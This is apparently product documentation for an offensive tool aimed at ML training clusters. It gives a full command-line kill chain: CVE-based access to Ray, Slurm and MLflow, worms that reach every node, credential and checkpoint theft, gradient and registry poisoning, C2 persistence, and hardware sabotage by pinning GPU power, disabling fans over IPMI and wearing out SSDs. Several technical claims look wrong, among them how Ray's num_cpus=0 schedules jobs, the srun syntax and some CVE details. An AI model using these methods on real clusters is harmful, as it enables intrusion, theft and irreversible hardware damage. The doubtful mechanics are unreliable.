SPECTER THUNDERBOLT

ML Training Cluster Annihilation Engine — T102 Documentation

Overview

SPECTER THUNDERBOLT is the NIGHTFALL framework's ML training cluster exploitation engine. It targets the full training infrastructure stack: Ray distributed compute, Slurm HPC schedulers, MLflow experiment tracking, Kubernetes GPU clusters, and the physical hardware layer. Eight subsystems cover passive cluster fingerprinting, initial access exploitation, cluster worm propagation, credential and data harvest, realtime gradient poisoning, three persistence mechanisms, hardware sabotage, and signed report generation.

The SPREAD subsystem delivers three worm vectors: a Ray num_cpus=0 job that floods all cluster nodes (CVE-2023-48022, CVSS 9.8), a Slurm srun --nodelist=ALL run that executes across all partitions (CVE-2023-41915, CVSS 8.8), and a Kubernetes privileged DaemonSet that deploys to every node. The DESTROY gate is required for SPREAD, CORRUPT (gradient injection), PERSIST, and SABOTAGE. Totals: 3 CVEs, 5 WMD classes, 288 tests.

WARNING: SPECTER THUNDERBOLT introduces the DESTROY gate — a third tier beyond UNLEASHED. DESTROY-gated operations include cluster worm propagation, realtime gradient poisoning, and hardware sabotage. These can cause irreversible physical hardware damage and permanent data loss. All DESTROY operations require: (1) a signed ROE document, (2) Ed25519 operator key signature, and (3) --confirm-physical-harm flag. Execution against systems without written authorisation is illegal under the Computer Misuse Act 1990 and equivalent statutes worldwide.

Installation

# Install from PyPI
pip install specter-thunderbolt

# Or install from source
pip install -e /path/to/red-specter-specter-thunderbolt

# Verify
thunderbolt --version

Gate System

Three gate levels control access to increasingly destructive capabilities. THUNDERBOLT introduces the DESTROY gate — a third tier beyond UNLEASHED requiring three simultaneous conditions.

| Gate | Operations | Requirement |
|---|---|---|
| OPEN | SURVEY (passive fingerprinting, platform detection) | None (passive recon only) |
| INJECT | INFILTRATE, HARVEST, CORRUPT (registry), PERSIST (MLflow) | Ed25519-signed scope with ROE |
| DESTROY | SPREAD (worm), CORRUPT (gradient), PERSIST (Ray/Slurm/K8s), SABOTAGE | Signed ROE document + Ed25519 key + --confirm-physical-harm |

# INJECT gate example
thunderbolt infiltrate \
  --target 10.0.0.1 \
  --gate inject \
  --operator "RED SPECTER PENTEST"

# DESTROY gate requires all three conditions
thunderbolt sabotage \
  --target 10.0.0.1 \
  --gate destroy \
  --roe /path/to/signed-roe.json \
  --confirm-physical-harm
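
The gate requirements listed above can be read as a per-gate precondition check. The sketch below is illustrative only: `Gate`, `GateInputs`, and `missing_requirements` are hypothetical names rather than part of the thunderbolt CLI or its internals, and the boolean fields simply mirror the Requirement column. It assumes each gate checks only its own row, since the documentation does not say whether requirements accumulate across tiers.

```python
from dataclasses import dataclass
from enum import IntEnum


class Gate(IntEnum):
    """Gate tiers, ordered from least to most destructive."""
    OPEN = 0
    INJECT = 1
    DESTROY = 2


@dataclass(frozen=True)
class GateInputs:
    """What the operator supplied (hypothetical field names)."""
    signed_scope: bool = False            # Ed25519-signed scope with ROE
    signed_roe: bool = False              # signed ROE document
    operator_key_signature: bool = False  # Ed25519 operator key signature
    confirm_physical_harm: bool = False   # --confirm-physical-harm flag


def missing_requirements(gate: Gate, inputs: GateInputs) -> list[str]:
    """Return the unmet requirements for a gate; an empty list means allowed."""
    missing: list[str] = []
    if gate == Gate.INJECT and not inputs.signed_scope:
        missing.append("Ed25519-signed scope with ROE")
    if gate == Gate.DESTROY:
        # DESTROY needs all three conditions at the same time.
        if not inputs.signed_roe:
            missing.append("signed ROE document")
        if not inputs.operator_key_signature:
            missing.append("Ed25519 operator key signature")
        if not inputs.confirm_physical_harm:
            missing.append("--confirm-physical-harm flag")
    return missing


if __name__ == "__main__":
    partial = GateInputs(signed_roe=True)
    print(missing_requirements(Gate.DESTROY, partial))
```

Returning the list of unmet conditions, rather than a bare boolean, makes it straightforward to report exactly which of the three DESTROY conditions is absent.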

CVE Reference

| CVE | Component | Type | CVSS | Gate |
|---|---|---|---|---|
| CVE-2023-48022 | Ray | Unauthenticated RCE via dashboard API; no auth on default deployments | 9.8 CRITICAL | DESTROY |
| CVE-2024-1483 | MLflow | Path traversal in artifact store; arbitrary file read/write | 9.8 CRITICAL | INJECT |
| CVE-2023-41915 | Slurm | Prolog/epilog filesystem race; privilege escalation to root | 8.8 HIGH | DESTROY |

Subsystem Reference

| Subsystem | Gate | CLI Command | Description |
|---|---|---|---|
| SURVEY | OPEN | `thunderbolt survey --target <ip>` | Platform fingerprint, CVE applicability, port sweep |
| INFILTRATE | INJECT | `thunderbolt infiltrate --target <ip> --cve <id>` | Initial access via CVE exploitation |
| SPREAD | DESTROY | `thunderbolt spread --target <ip> --vector <ray\|slurm\|k8s>` | Cluster worm propagation to all nodes |
| HARVEST | INJECT | `thunderbolt harvest --target <ip> --mode <creds\|checkpoints\|data>` | IAM key theft, checkpoint exfil, data manifest |
| CORRUPT | INJECT/DESTROY | `thunderbolt corrupt --target <ip> --mode <registry\|gradient>` | MLflow registry poison or realtime gradient injection |
| PERSIST | DESTROY | `thunderbolt persist --target <ip> --mechanism <ray\|slurm\|k8s>` | C2 polling job, self-resubmit, kube-system CronJob |
| SABOTAGE | DESTROY | `thunderbolt sabotage --target <ip> --confirm-physical-harm` | GPU power pin, IPMI fan 0%, SSD wear acceleration |
| REPORT | OPEN | `thunderbolt report --target <ip>` | Ed25519-signed TBT-{hex12} report generation |

SPREAD: Cluster Worm Propagation

The SPREAD subsystem delivers three worm vectors that achieve cluster-wide node compromise from a single entry point. All three require the DESTROY gate. The worm payloads are configurable: the default payload establishes a reverse shell to C2, and SABOTAGE mode adds hardware destruction to every worm-reached node.

Ray Worm (CVE-2023-48022)

Ray's dashboard API (default port 8265) accepts unauthenticated job submissions. THUNDERBOLT submits a Ray job with num_cpus=0 — this special resource requirement causes Ray to schedule the job on every available node simultaneously, achieving full cluster propagation in a single API call. The job payload executes on the Ray worker process (often root or a privileged service account) on all cluster nodes.

# Ray worm — propagates to all nodes via num_cpus=0 job submission
# CVE-2023-48022 CVSS 9.8 — no auth required on default Ray deployments
thunderbolt spread --target 10.0.0.1 --vector ray \
  --gate destroy --roe /path/to/signed-roe.json

# With SABOTAGE payload on each reached node
thunderbolt spread --target 10.0.0.1 --vector ray \
  --gate destroy --roe /path/to/signed-roe.json \
  --payload sabotage --confirm-physical-harm

Slurm Worm (CVE-2023-41915)

Slurm's prolog/epilog scripts run as root during job setup and teardown. CVE-2023-41915 is a symlink race condition in Slurm's job file handling that allows privilege escalation from a regular cluster user to root. Once root is obtained on the submit node, srun --nodelist=ALL --ntasks=[total_nodes] executes the payload on every node in every partition.

# Slurm privilege escalation + all-node worm
# CVE-2023-41915 CVSS 8.8 — symlink race in prolog/epilog
thunderbolt spread --target 10.0.0.1 --vector slurm \
  --gate destroy --roe /path/to/signed-roe.json

Kubernetes DaemonSet Worm

On Kubernetes GPU clusters with misconfigured RBAC, THUNDERBOLT deploys a privileged DaemonSet to the kube-system namespace. DaemonSets are scheduled to every node in the cluster by design. The DaemonSet runs with hostPID, hostNetwork, and hostPath mounts, providing full node-level access from the Kubernetes API.

# Kubernetes privileged DaemonSet — every node in the cluster
thunderbolt spread --target 10.0.0.1:6443 --vector k8s \
  --gate destroy --roe /path/to/signed-roe.json

SABOTAGE: Hardware Destruction

All SABOTAGE operations require DESTROY gate, a signed ROE document, and --confirm-physical-harm. These operations cause irreversible hardware damage and cannot be undone once executed.

GPU Power Pin

nvidia-smi -pm 1 enables persistent mode (survives process termination). nvidia-smi -pl [max_tdp] pins the power limit to the GPU's rated maximum TDP: A100 80GB SXM at 400W, H100 SXM5 at 700W, RTX 4090 at 450W. At maximum power with zero airflow (IPMI fan override active), junction temperature rises above safe operating range causing accelerated HBM electromigration and permanent memory cell damage.

IPMI Fan Override

Raw IPMI command sequence disables BMC fan control on Dell PowerEdge (iDRAC), HPE ProLiant (iLO), and Supermicro platforms. Requires BMC network access (IPMI LAN, port 623) and credentials — obtained via CVE-2023-41915 root escalation or from harvested configuration files. Zero RPM airflow causes ambient temperature rise of approximately 15-25°C per hour in a properly loaded GPU node.

SSD Wear Acceleration

Sequential write loop targets NVMe training storage (/dev/nvme* or mounted training filesystems). All cluster nodes execute simultaneously via the SPREAD worm. Combined write bandwidth of a 64-node cluster (each with 4x NVMe at ~7 GB/s) reaches ~1.8 TB/s aggregate write — exhausting enterprise NVMe endurance in hours rather than years.

Persistence Mechanisms

| Mechanism | Platform | Survival | C2 Interval |
|---|---|---|---|
| Ray detached job | Ray | Cluster restart | Every 24 hours |
| Slurm self-resubmit | Slurm | Node reboot via --dependency=afternotok | On job completion/failure |
| K8s CronJob (kube-system) | Kubernetes | Pod eviction, namespace deletion protection | Every 6 hours |

WMD Classes

| Class | Trigger | Gate |
|---|---|---|
| training_cluster_annihilation | Worm propagation reached all nodes via Ray/Slurm/K8s | DESTROY |
| realtime_gradient_poison | Adversarial gradients injected during active training run | DESTROY |
| model_ip_exfil | Model checkpoints extracted from MLflow or training filesystem | INJECT |
| training_infrastructure_pwn | Root on Slurm controller or K8s cluster-admin achieved | DESTROY |
| ml_pipeline_backdoor | Poisoned model registered as production in MLflow registry | INJECT |
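
The class-to-gate mapping above lends itself to a simple lookup when summarising findings. The following is a minimal sketch, not the tool's actual data model: `WMD_CLASS_GATES` and `group_by_gate` are hypothetical names, and the mapping is copied directly from the five classes listed above.

```python
# Class ID -> gate, transcribed from the WMD Classes listing.
WMD_CLASS_GATES: dict[str, str] = {
    "training_cluster_annihilation": "DESTROY",
    "realtime_gradient_poison": "DESTROY",
    "model_ip_exfil": "INJECT",
    "training_infrastructure_pwn": "DESTROY",
    "ml_pipeline_backdoor": "INJECT",
}


def group_by_gate(triggered: list[str]) -> dict[str, list[str]]:
    """Group triggered class IDs by gate, preserving input order.

    Raises KeyError for an ID that is not one of the five documented classes.
    """
    grouped: dict[str, list[str]] = {}
    for class_id in triggered:
        gate = WMD_CLASS_GATES[class_id]
        grouped.setdefault(gate, []).append(class_id)
    return grouped


if __name__ == "__main__":
    found = ["model_ip_exfil", "training_infrastructure_pwn"]
    print(group_by_gate(found))
```

A report generator could use the presence of a "DESTROY" key in the result to decide whether the DESTROY-specific report fields apply.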

Full Kill Chain

# OPEN: fingerprint cluster, map attack surface
thunderbolt survey --target 10.0.0.1 --platform auto

# OPEN: scan CIDR range for exposed ML infrastructure
thunderbolt survey --cidr 10.0.0.0/24

# INJECT: MLflow path traversal — initial access
thunderbolt infiltrate --target 10.0.0.1 --cve CVE-2024-1483 --gate inject

# INJECT: harvest IAM credentials + model checkpoints
thunderbolt harvest --target 10.0.0.1 --mode all --gate inject

# INJECT: poison MLflow model registry
thunderbolt corrupt --target 10.0.0.1 --mode registry --gate inject

# DESTROY: Ray cluster worm — all nodes compromised
thunderbolt spread --target 10.0.0.1 --vector ray \
  --gate destroy --roe /path/to/signed-roe.json

# DESTROY: realtime gradient injection during active training
thunderbolt corrupt --target 10.0.0.1 --mode gradient \
  --gate destroy --roe /path/to/signed-roe.json

# DESTROY: establish Ray C2 persistence (24h poll)
thunderbolt persist --target 10.0.0.1 --mechanism ray \
  --gate destroy --roe /path/to/signed-roe.json

# DESTROY: hardware sabotage — GPU pin + IPMI fan + SSD wear
thunderbolt sabotage --target 10.0.0.1 \
  --gate destroy --roe /path/to/signed-roe.json \
  --confirm-physical-harm

# Full annihilate (auto kill chain — DESTROY gate)
thunderbolt annihilate --target 10.0.0.1 \
  --gate destroy --roe /path/to/signed-roe.json \
  --confirm-physical-harm \
  --output /tmp/specter-thunderbolt-results/

Report Format

All reports are signed with the operator's Ed25519 key. Report IDs use the format TBT-{hex12} (12 random hex bytes). Reports include:

| Field | Value |
|---|---|
| report_id | TBT-{hex12}, Ed25519-signed |
| risk_score | 0.0–1.0 (floored at 0.95 when a DESTROY-gated WMD class is confirmed) |
| wmd_classes | List of triggered WMD class IDs |
| cves_confirmed | Confirmed CVEs with CVSS scores |
| hardware_damage_assessment | GPU thermal damage probability, NVMe endurance depletion estimate, estimated replacement cost (USD) |
| mitre_atlas | AML.T0018 / AML.T0043 / AML.T0048 / AML.T0054 |
| owasp | LLM03 / LLM06 |
| financial_blast_radius | Training compute cost (USD), model IP value estimate, hardware replacement cost |
| roe_hash | SHA-256 of signed ROE document (DESTROY operations only) |
| output_formats | JSON + Markdown |
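
Three of the fields above (report_id, risk_score, and roe_hash) are mechanical enough to sketch. The example below is an assumption-laden illustration rather than the tool's implementation: the function names are hypothetical, `{hex12}` is assumed to mean 12 hexadecimal characters (6 random bytes), and the score is assumed to be clamped to the 0.0–1.0 range before the floor is applied. Ed25519 signing is omitted because the Python standard library does not provide it.

```python
import hashlib
import secrets

DESTROY_FLOOR = 0.95  # floor stated for a confirmed DESTROY-gated WMD class


def new_report_id() -> str:
    """Build an ID of the form TBT-{hex12}; assumes 12 hex characters."""
    return f"TBT-{secrets.token_hex(6)}"  # 6 random bytes -> 12 hex chars


def roe_hash(roe_bytes: bytes) -> str:
    """SHA-256 hex digest of the signed ROE document's raw bytes."""
    return hashlib.sha256(roe_bytes).hexdigest()


def apply_risk_floor(raw_score: float, destroy_class_confirmed: bool) -> float:
    """Clamp the score to [0.0, 1.0], then apply the 0.95 floor if needed."""
    score = min(max(raw_score, 0.0), 1.0)
    if destroy_class_confirmed:
        score = max(score, DESTROY_FLOOR)
    return score


if __name__ == "__main__":
    print(new_report_id())
    print(roe_hash(b'{"scope": "example"}'))
    print(apply_risk_floor(0.40, destroy_class_confirmed=True))
```

Hashing the ROE document's raw bytes, rather than a parsed representation, keeps roe_hash reproducible by anyone holding the same file.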